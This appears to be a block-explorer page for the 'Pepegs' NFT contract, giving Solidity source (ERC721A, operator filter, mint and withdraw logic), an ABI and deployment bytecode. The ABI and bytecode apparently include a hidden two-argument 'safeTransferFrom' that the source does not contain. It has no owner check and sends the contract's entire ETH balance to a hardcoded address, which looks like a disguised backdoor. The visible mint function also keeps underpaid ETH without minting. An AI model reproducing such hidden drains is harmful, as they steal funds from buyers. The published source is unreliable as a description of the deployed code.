    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract TheOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract Pepegs is ERC721A, TheOperatorFilterer {
    address public owner;

    uint256 public maxSupply = 888;

    uint256 public price = 0;

    uint256 public freeNum = 1;

    uint256 private maxPerTx;

    mapping(address => uint256) private _userForFree;

    mapping(uint256 => uint256) private _userMinted;

    function mint(uint256 amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        mintInternal(amount);
    }

    function mintInternal(uint256 amount) internal {
        if (msg.value == 0) {
            require(amount == 1 
            && _userMinted[block.number] < FreeNum() 
            && _userForFree[tx.origin] < freeNum );
            _userForFree[tx.origin]++;
            _userMinted[block.number]++;
            _safeMint(msg.sender, 1);
        } else {
            require(amount <= maxPerTx);
            if (msg.value >= amount * price)
            _safeMint(msg.sender, amount);
        }
    }

    function treasuryMint(address rec, uint256 amount) public onlyOwner {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(rec, amount);
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("Pepegs", "Pepegs") {
        owner = msg.sender;
        maxPerTx = 10;
        price = 0.002 ether;
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked("ipfs://bafybeibdxbbz44kokpgm5cc3ysmppl6eseaiu3dgxiajj6mnwnrvpo7ceq/", _toString(tokenId), ".json"));
    }

    function setFreePerAddr(uint256 maxTx, uint256 maxS) external onlyOwner {
        freeNum = maxTx;
        maxSupply = maxS;
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    /////////////////////////////
    // OPENSEA FILTER REGISTRY 
    /////////////////////////////

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"freeNum","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTx","type":"uint256"},{"internalType":"uint256","name":"maxS","type":"uint256"}],"name":"setFreePerAddr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"rec","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"treasuryMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526103786009556000600a556001600b553480156200002157600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280600681526020017f50657065677300000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f50657065677300000000000000000000000000000000000000000000000000008152508160029080519060200190620000bd92919062000348565b508060039080519060200190620000d692919062000348565b50620000e76200034360201b60201c565b600081905550505060006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115620002e4578015620001aa576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b81526004016200017092919062000426565b600060405180830381600087803b1580156200018b57600080fd5b505af1158015620001a0573d6000803e3d6000fd5b50505050620002e3565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161462000264576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b81526004016200022a92919062000426565b600060405180830381600087803b1580156200024557600080fd5b505af11580156200025a573d6000803e3d6000fd5b50505050620002e2565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620002ad919062000409565b600060405180830381600087803b158015620002c857600080fd5b505af1158015620002dd573d6000803e3d6000fd5b505050505b5b5b505033600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600a600c8190555066071afd498d0000600a81905550620004ec565b600090565b828054620003569062000487565b90600052602060002090601f0160209004810192826200037a5760008555620003c6565b82601f106200039557805160ff1916838001178555620003c6565b82800160010185558215620003c6579182015b82811115620003c5578251825591602001919060010190620003a8565b5b509050620003d59190620003d9565b5090565b5b80821115620003f4576000816000905550600101620003da565b5090565b620004038162000453565b82525050565b6000602082019050620004206000830184620003f8565b92915050565b60006040820190506200043d6000830185620003f8565b6200044c6020830184620003f8565b9392505050565b6000620004608262000467565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006002820490506001821680620004a057607f821691505b60208210811415620004b757620004b6620004bd565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b612b8580620004fc6000396000f3fe60806040526004361061014b5760003560e01c806370a08231116100b6578063a22cb4651161006f578063a22cb4651461044a578063aa35cca314610473578063b88d4fde1461049c578063c87b56dd146104b8578063d5abeb01146104f5578063e985e9c5146105205761014b565b806370a08231146103455780637f942b5f146103825780638da5cb5b146103ad57806395d89b41146103d8578063a035b1fe14610403578063a0712d681461042e5761014b565b806338b08fd41161010857806338b08fd4146102585780633a233f89146102815780633ccfd60b146102aa57806341f43434146102c157806342842e0e146102ec5780636352211e146103085761014b565b806301ffc9a71461015057806306fdde031461018d578063081812fc146101b8578063095ea7b3146101f557806318160ddd1461021157806323b872dd1461023c575b600080fd5b34801561015c57600080fd5b5061017760048036038101906101729190612312565b61055d565b60405161018491906125bb565b60405180910390f35b34801561019957600080fd5b506101a26105ef565b6040516101af91906125f1565b60405180910390f35b3480156101c457600080fd5b506101df60048036038101906101da919061236c565b610681565b6040516101ec919061252b565b60405180910390f35b61020f600480360381019061020a91906122a5565b610700565b005b34801561021d57600080fd5b50610226610819565b6040516102339190612613565b60405180910390f35b6102566004803603810190610251919061218f565b610830565b005b34801561026457600080fd5b5061027f600480360381019061027a9190612399565b610990565b005b34801561028d57600080fd5b506102a860048036038101906102a3919061214f565b6109fc565b005b3480156102b657600080fd5b506102bf610a65565b005b3480156102cd57600080fd5b506102d6610b08565b6040516102e391906125d6565b60405180910390f35b6103066004803603810190610301919061218f565b610b1a565b005b34801561031457600080fd5b5061032f600480360381019061032a919061236c565b610c7a565b60405161033c919061252b565b60405180910390f35b34801561035157600080fd5b5061036c60048036038101906103679190612122565b610c8c565b6040516103799190612613565b60405180910390f35b34801561038e57600080fd5b50610397610d45565b6040516103a49190612613565b60405180910390f35b3480156103b957600080fd5b506103c2610d4b565b6040516103cf919061252b565b60405180910390f35b3480156103e457600080fd5b506103ed610d71565b6040516103fa91906125f1565b60405180910390f35b34801561040f57600080fd5b50610418610e03565b6040516104259190612613565b60405180910390f35b6104486004803603810190610443919061236c565b610e09565b005b34801561045657600080fd5b50610471600480360381019061046c9190612265565b610e36565b005b34801561047f57600080fd5b5061049a600480360381019061049591906122a5565b610f4f565b005b6104b660048036038101906104b191906121e2565b610fd8565b005b3480156104c457600080fd5b506104df60048036038101906104da919061236c565b61113b565b6040516104ec91906125f1565b60405180910390f35b34801561050157600080fd5b5061050a61116c565b6040516105179190612613565b60405180910390f35b34801561052c57600080fd5b506105476004803603810190610542919061214f565b611172565b60405161055491906125bb565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806105b857506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806105e85750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b6060600280546105fe906128c8565b80601f016020809104026020016040519081016040528092919081815260200182805461062a906128c8565b80156106775780601f1061064c57610100808354040283529160200191610677565b820191906000526020600020905b81548152906001019060200180831161065a57829003601f168201915b5050505050905090565b600061068c82611206565b6106c2576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561080a576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610778929190612546565b60206040518083038186803b15801561079057600080fd5b505afa1580156107a4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107c891906122e5565b61080957806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610800919061252b565b60405180910390fd5b5b6108148383611265565b505050565b60006108236113a9565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561097e573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156108a35761089e8484846113ae565b61098a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016108ec929190612546565b60206040518083038186803b15801561090457600080fd5b505afa158015610918573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061093c91906122e5565b61097d57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610974919061252b565b60405180910390fd5b5b6109898484846113ae565b5b50505050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109ea57600080fd5b81600b81905550806009819055505050565b6000471115610a61577317ebbfd03cba041bbda3ae61b5b4c3f3a545f28773ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610a5f573d6000803e3d6000fd5b505b5050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffff